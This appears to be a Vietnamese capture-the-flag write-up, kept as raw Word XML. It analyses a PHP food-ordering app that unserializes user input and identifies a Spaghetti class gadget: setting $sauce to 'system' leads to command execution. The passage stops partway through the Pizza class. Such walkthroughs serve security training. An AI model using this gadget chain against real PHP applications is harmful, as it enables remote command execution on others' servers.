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921A" w14:textId="350CF19E" w:rsidR="004D1196" w:rsidRDefault="004D1196" w:rsidP="004D1196">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk207040513"/>
      <w:r w:rsidRPr="000121A8">
        <w:t xml:space="preserve">Truy cập vào địa chỉ URL được cung cấp trong đề bài. Sau khi truy cập, giao diện mặc định hiển thị một trang đăng nhập với các trường yêu cầu </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">username </w:t>
      </w:r>
      <w:r w:rsidRPr="000121A8">
        <w:t xml:space="preserve">và </w:t>
      </w:r>
      <w:r>
        <w:t>password</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="1A33043C" w14:textId="1B8A5062" w:rsidR="0002152D" w:rsidRDefault="00033063" w:rsidP="00B20C0C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00033063">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08DFA565" wp14:editId="4734F915">
            <wp:extent cx="5553850" cy="3820058"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:docPr id="13604054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5428" name="Picture 1" descr="A screenshot of a video game&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5553850" cy="3820058"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B48BBC" w14:textId="7AC8D058" w:rsidR="004D1196" w:rsidRDefault="004D1196" w:rsidP="00B20C0C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00287875">
        <w:t xml:space="preserve">Sau khi tiến hành đăng ký tài khoản và đăng nhập thành công, ứng dụng phản hồi với giao diện hiển thị </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">chức năng order đồ </w:t>
      </w:r>
      <w:r w:rsidR="00EA3A1E">
        <w:t>ăn với 3 món ăn được hiển thị như trong ảnh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3504DC" w14:textId="77777777" w:rsidR="001A663E" w:rsidRDefault="00033063" w:rsidP="00033063">
      <w:r w:rsidRPr="00033063">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C9EEAF9" wp14:editId="33B18B12">
            <wp:extent cx="5731510" cy="2731135"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="91256512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5124" name="Picture 1" descr="A screenshot of a video game&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2731135"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7588E599" w14:textId="77777777" w:rsidR="001A663E" w:rsidRDefault="001A663E">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6D66F3" w14:textId="77777777" w:rsidR="001A663E" w:rsidRDefault="001A663E" w:rsidP="00B20C0C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001A663E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">thực hiện đặt món ăn bằng cách nhấn vào một trong các lựa chọn hiển thị trên giao diện. Sau khi thao tác, thông tin đơn hàng được ghi nhận và lưu lại, thể hiện rõ như trong hình minh </w:t>
      </w:r>
      <w:r>
        <w:t>họa:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732C25AC" w14:textId="3AC40E82" w:rsidR="00AC1DB2" w:rsidRDefault="00AC1DB2" w:rsidP="00033063">
      <w:r w:rsidRPr="00AC1DB2">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1501C953" wp14:editId="0857882D">
            <wp:extent cx="5731510" cy="2650490"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1000239098" name="Picture 1" descr="A video gam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9098" name="Picture 1" descr="A video game screen with text&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2650490"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="661D49A8" w14:textId="3CEDED07" w:rsidR="009840CC" w:rsidRPr="009840CC" w:rsidRDefault="009840CC" w:rsidP="009840CC">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009840CC">
        <w:t>Khi kiểm tra bằng Burp Suite, ta phát hiện rằng dữ liệu gửi đi trong lệnh đặt món ăn được mã hóa và có dạng đối tượng PHP được serialize:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009840CC">
        <w:t>O:9:"Spaghetti":3:{s:5:"sauce";N;s:7:"noodles"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009840CC">
        <w:t>;N;s:7:"portion";N;}</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4012D9DE" w14:textId="1F889B58" w:rsidR="00AC03C6" w:rsidRDefault="00AC03C6" w:rsidP="00033063">
      <w:r w:rsidRPr="00AC03C6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56BC3990" wp14:editId="471DE40D">
            <wp:extent cx="5731510" cy="1567815"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="994991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91481" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1567815"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A3B24C" w14:textId="1D1C0AD3" w:rsidR="009840CC" w:rsidRDefault="009840CC" w:rsidP="00B20C0C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009840CC">
        <w:br/>
        <w:t xml:space="preserve">Đây là biểu diễn của một đối tượng thuộc class Spaghetti, với ba thuộc tính là sauce, noodles và portion, đều có giá trị NULL. Việc sử dụng định dạng này cho thấy hệ thống đang xử lý dữ liệu đầu vào bằng cách deserialize đối </w:t>
      </w:r>
      <w:r w:rsidR="00B20C0C">
        <w:t>tượng.</w:t>
      </w:r>
      <w:r w:rsidRPr="009840CC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B20C0C">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="009840CC">
        <w:t xml:space="preserve">ừ đó mở ra khả năng khai thác PHP Object </w:t>
      </w:r>
      <w:r>
        <w:t>Injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268639BB" w14:textId="51300A5E" w:rsidR="00370168" w:rsidRDefault="00370168" w:rsidP="00B20C0C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Để tiếp tục khai thác, mình sẽ nghiên cứu thêm về source </w:t>
      </w:r>
      <w:r w:rsidR="00D7561D">
        <w:t>code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235B13E0" w14:textId="77777777" w:rsidR="00D7561D" w:rsidRDefault="00D7561D" w:rsidP="00033063"/>
    <w:p w14:paraId="08299E84" w14:textId="77777777" w:rsidR="00D7561D" w:rsidRDefault="00D7561D" w:rsidP="00033063"/>
    <w:p w14:paraId="4A3A64C2" w14:textId="77777777" w:rsidR="00D7561D" w:rsidRDefault="00D7561D" w:rsidP="00033063"/>
    <w:p w14:paraId="303C49CB" w14:textId="77777777" w:rsidR="00D7561D" w:rsidRDefault="00D7561D" w:rsidP="00033063"/>
    <w:p w14:paraId="3996A4BE" w14:textId="77777777" w:rsidR="00D7561D" w:rsidRDefault="00D7561D" w:rsidP="00033063"/>
    <w:p w14:paraId="61CF2AF6" w14:textId="77777777" w:rsidR="00D7561D" w:rsidRDefault="00D7561D" w:rsidP="00033063"/>
    <w:p w14:paraId="731A5F5A" w14:textId="77777777" w:rsidR="00D7561D" w:rsidRDefault="00D7561D" w:rsidP="00033063"/>
    <w:p w14:paraId="18A1083D" w14:textId="7DD18E48" w:rsidR="00D7561D" w:rsidRPr="009840CC" w:rsidRDefault="00D7561D" w:rsidP="00033063">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Phân tích chức năng order trong source code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CC166C" w14:textId="614F7D92" w:rsidR="004713C4" w:rsidRDefault="004713C4" w:rsidP="00033063">
      <w:r w:rsidRPr="00CC6588">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="419132F0" wp14:editId="7AFB0224">
            <wp:extent cx="5731510" cy="2494280"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="504678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8560" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2494280"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="664DA9B1" w14:textId="6F87AFBC" w:rsidR="00780F36" w:rsidRPr="00780F36" w:rsidRDefault="00780F36" w:rsidP="00780F36">
      <w:r>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidRPr="00780F36">
        <w:t xml:space="preserve">uồng xử lý đơn </w:t>
      </w:r>
      <w:r>
        <w:t>hàng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C73D04E" w14:textId="77777777" w:rsidR="00780F36" w:rsidRPr="00780F36" w:rsidRDefault="00780F36" w:rsidP="00780F36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00780F36">
        <w:t>Người dùng gửi yêu cầu đặt món ăn thông qua giao diện web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120B147C" w14:textId="77777777" w:rsidR="00780F36" w:rsidRPr="00780F36" w:rsidRDefault="00780F36" w:rsidP="00780F36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00780F36">
        <w:t>Dữ liệu được gửi dưới dạng POST với tham số data, chứa chuỗi Base64-encoded của một đối tượng PHP đã được serialize.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17219E32" w14:textId="77777777" w:rsidR="00780F36" w:rsidRPr="00B20C0C" w:rsidRDefault="00780F36" w:rsidP="00780F36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00780F36">
        <w:t>Server thực hiện:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B20C0C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5121D86E" w14:textId="673FD6D5" w:rsidR="00780F36" w:rsidRPr="00780F36" w:rsidRDefault="00780F36" w:rsidP="00780F36">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00780F36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>$order = unserialize(base64_decode($_POST['data']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A78DEE3" w14:textId="77777777" w:rsidR="00780F36" w:rsidRPr="00780F36" w:rsidRDefault="00780F36" w:rsidP="00780F36">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00780F36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>$foodName = get_class($order);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13ADB421" w14:textId="4CF8F252" w:rsidR="00780F36" w:rsidRDefault="00780F36" w:rsidP="00780F36">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00780F36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>$result = $db-&gt;order($id, $foodName);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FC37A6" w14:textId="10F2D147" w:rsidR="00780F36" w:rsidRPr="00780F36" w:rsidRDefault="00780F36" w:rsidP="00780F36">
      <w:r w:rsidRPr="00780F36">
        <w:t xml:space="preserve">→ Điều này cho thấy server giải mã và giải nén đối tượng, sau đó lấy tên class để lưu vào cơ sở dữ liệu. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BDB275" w14:textId="3ABEAD04" w:rsidR="00780F36" w:rsidRPr="00780F36" w:rsidRDefault="005B298E" w:rsidP="00291DB0">
      <w:r w:rsidRPr="005B298E">
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="005B298E">
        <w:t xml:space="preserve">ếu ta có thể gửi một đối tượng tùy chỉnh, ta có thể kích hoạt các magic methods như </w:t>
      </w:r>
      <w:r w:rsidR="00C42D40">
        <w:t>__</w:t>
      </w:r>
      <w:r>
        <w:t>destruct()</w:t>
      </w:r>
      <w:r w:rsidRPr="005B298E">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C42D40">
        <w:t>__wakeup</w:t>
      </w:r>
      <w:r w:rsidRPr="005B298E">
        <w:t xml:space="preserve"> , hoặc </w:t>
      </w:r>
      <w:r w:rsidR="00C42D40">
        <w:t>__toString()</w:t>
      </w:r>
      <w:r w:rsidRPr="005B298E">
        <w:t xml:space="preserve"> để thực thi hành vi không mong muốn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B0D152" w14:textId="77777777" w:rsidR="00467B38" w:rsidRDefault="00467B38" w:rsidP="00033063">
      <w:r w:rsidRPr="00467B38">
        <w:t xml:space="preserve">Để tiếp tục, mình sẽ kiểm tra các class tương ứng với ba món ăn hiển thị trong giao </w:t>
      </w:r>
      <w:r>
        <w:t>diện:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB4D191" w14:textId="12050BCB" w:rsidR="00467B38" w:rsidRDefault="003E5C1F" w:rsidP="00033063">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:r w:rsidR="00467B38" w:rsidRPr="00B20C0C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Class Spaghett</w:t>
      </w:r>
      <w:r w:rsidR="00467B38" w:rsidRPr="00B20C0C">
        <w:t>i:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C01A9BE" w14:textId="2CEFC04B" w:rsidR="00CC6588" w:rsidRDefault="00CC6588" w:rsidP="00033063">
      <w:r w:rsidRPr="00CC6588">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F77ADA6" wp14:editId="5FA365FA">
            <wp:extent cx="5731510" cy="1595120"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="1849875999" name="Picture 1"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5999" name="Picture 1" descr="A black screen with a black border&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1595120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AD9AEE" w14:textId="01D692B9" w:rsidR="00B20C0C" w:rsidRPr="00B20C0C" w:rsidRDefault="00B20C0C" w:rsidP="00B20C0C">
      <w:r w:rsidRPr="00B20C0C">
        <w:t>Cấu trúc:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641D45F8" w14:textId="77777777" w:rsidR="00B20C0C" w:rsidRPr="00B20C0C" w:rsidRDefault="00B20C0C" w:rsidP="00B20C0C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B20C0C">
        <w:t>Có 3 thuộc tính: $sauce, $noodles, $portion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52122D0F" w14:textId="77777777" w:rsidR="00B20C0C" w:rsidRPr="00B20C0C" w:rsidRDefault="00B20C0C" w:rsidP="00B20C0C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B20C0C">
        <w:t>Định nghĩa magic method __get($tomato)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E577CDB" w14:textId="17215519" w:rsidR="00B20C0C" w:rsidRDefault="00B20C0C" w:rsidP="00B20C0C">
      <w:r w:rsidRPr="00B20C0C">
        <w:lastRenderedPageBreak/>
        <w:t>Điểm khai thác:</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AE4728" w:rsidRPr="00AE4728" w14:paraId="71BEAF47" w14:textId="77777777" w:rsidTr="006A054B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34047B2C" w14:textId="77777777" w:rsidR="00AE4728" w:rsidRPr="00AE4728" w:rsidRDefault="00AE4728" w:rsidP="00AE4728">
            <w:r w:rsidRPr="00AE4728">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AF62013" w14:textId="77777777" w:rsidR="00AE4728" w:rsidRPr="00AE4728" w:rsidRDefault="00AE4728" w:rsidP="00AE4728">
            <w:r w:rsidRPr="00AE4728">
              <w:t>2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F39519E" w14:textId="77777777" w:rsidR="00AE4728" w:rsidRPr="00AE4728" w:rsidRDefault="00AE4728" w:rsidP="00AE4728">
            <w:r w:rsidRPr="00AE4728">
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56230090" w14:textId="77777777" w:rsidR="006A054B" w:rsidRDefault="00AE4728" w:rsidP="00AE4728">
            <w:r w:rsidRPr="00AE4728">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>public</w:t>
            </w:r>
            <w:r w:rsidRPr="00AE4728">
              <w:t xml:space="preserve"> function __get($tomato) { </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="478E95B2" w14:textId="52A07378" w:rsidR="00AE4728" w:rsidRPr="00AE4728" w:rsidRDefault="006A054B" w:rsidP="00AE4728">
            <w:r>
              <w:t xml:space="preserve">       </w:t>
            </w:r>
            <w:r w:rsidR="00AE4728" w:rsidRPr="00AE4728">
              <w:t xml:space="preserve">($this-&gt;sauce)(); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44119645" w14:textId="77777777" w:rsidR="00AE4728" w:rsidRPr="00AE4728" w:rsidRDefault="00AE4728" w:rsidP="00AE4728">
            <w:r w:rsidRPr="00AE4728">
              <w:t xml:space="preserve">} </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2A902457" w14:textId="77777777" w:rsidR="00AE4728" w:rsidRPr="00B20C0C" w:rsidRDefault="00AE4728" w:rsidP="00B20C0C"/>
    <w:p w14:paraId="2BDC3D8F" w14:textId="77777777" w:rsidR="00B20C0C" w:rsidRPr="00B20C0C" w:rsidRDefault="00B20C0C" w:rsidP="00B20C0C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B20C0C">
        <w:t>Khi truy cập một thuộc tính không tồn tại, PHP sẽ gọi __get().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3273A3" w14:textId="77777777" w:rsidR="00B20C0C" w:rsidRPr="00B20C0C" w:rsidRDefault="00B20C0C" w:rsidP="00B20C0C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B20C0C">
        <w:t xml:space="preserve">Trong __get(), $this-&gt;sauce được gọi như một </w:t>
      </w:r>
      <w:r w:rsidRPr="00B20C0C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hàm</w:t>
      </w:r>
      <w:r w:rsidRPr="00B20C0C">
        <w:t>, nghĩa là nếu ta gán $sauce = 'system', thì $this-&gt;sauce() sẽ trở thành system().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198B0225" w14:textId="77777777" w:rsidR="00B20C0C" w:rsidRPr="00B20C0C" w:rsidRDefault="00B20C0C" w:rsidP="00B20C0C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B20C0C">
        <w:t xml:space="preserve">→ </w:t>
      </w:r>
      <w:r w:rsidRPr="00B20C0C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Khai thác:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B20C0C">
        <w:t xml:space="preserve"> Gán $sauce = 'system', sau đó truy cập thuộc tính không tồn tại để thực thi lệnh hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E996DD4" w14:textId="77777777" w:rsidR="00B20C0C" w:rsidRDefault="00B20C0C" w:rsidP="00033063"/>
    <w:p w14:paraId="6443096C" w14:textId="77777777" w:rsidR="00540C8F" w:rsidRDefault="00947875" w:rsidP="00033063">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:r w:rsidRPr="00B20C0C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Class </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pizza</w:t>
      </w:r>
      <w:r w:rsidRPr="00B20C0C">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00540C8F" w:rsidRPr="00540C8F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A20C0BF" w14:textId="4302FA24" w:rsidR="00467B38" w:rsidRDefault="00540C8F" w:rsidP="00033063">
      <w:r w:rsidRPr="00CC6588">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A84C697" wp14:editId="4F95DB18">
            <wp:extent cx="5731510" cy="1661795"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="76528410" name="Picture 1"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8410" name="Picture 1" descr="A black screen with a black border&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1661795"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B86D77B" w14:textId="77777777" w:rsidR="00947875" w:rsidRPr="00B20C0C" w:rsidRDefault="00947875" w:rsidP="00947875">
      <w:r w:rsidRPr="00B20C0C">
        <w:t>Cấu trúc:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31358FDA" w14:textId="1C46091A" w:rsidR="00B649E9" w:rsidRPr="00B649E9" w:rsidRDefault="00B649E9" w:rsidP="00B649E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B649E9">
        <w:t>Có 3 thuộc tính: $price, $cheese, $size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDC653A" w14:textId="77777777" w:rsidR="00B649E9" w:rsidRPr="00B649E9" w:rsidRDefault="00B649E9" w:rsidP="00B649E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B649E9">
        <w:t>Định nghĩa magic method __destruct()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18244368" w14:textId="339B7F21" w:rsidR="00B649E9" w:rsidRPr="00B649E9" w:rsidRDefault="00B649E9" w:rsidP="00B649E9">
      <w:r w:rsidRPr="00B649E9">
        <w:t xml:space="preserve">Điểm khai </w:t>
      </w:r>
      <w:r>
        <w:t>thác:</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B649E9" w:rsidRPr="00B649E9" w14:paraId="782DCD8C" w14:textId="77777777" w:rsidTr="00B649E9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C0FE28B" w14:textId="77777777" w:rsidR="00B649E9" w:rsidRPr="00B649E9" w:rsidRDefault="00B649E9" w:rsidP="00B649E9">
            <w:r w:rsidRPr="00B649E9">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0872EBA1" w14:textId="77777777" w:rsidR="00B649E9" w:rsidRPr="00B649E9" w:rsidRDefault="00B649E9" w:rsidP="00B649E9">
            <w:r w:rsidRPr="00B649E9">
              <w:t>2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F97E8A4" w14:textId="51E82D1F" w:rsidR="00B649E9" w:rsidRPr="00B649E9" w:rsidRDefault="00B649E9" w:rsidP="00B649E9">
            <w:r w:rsidRPr="00B649E9">
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
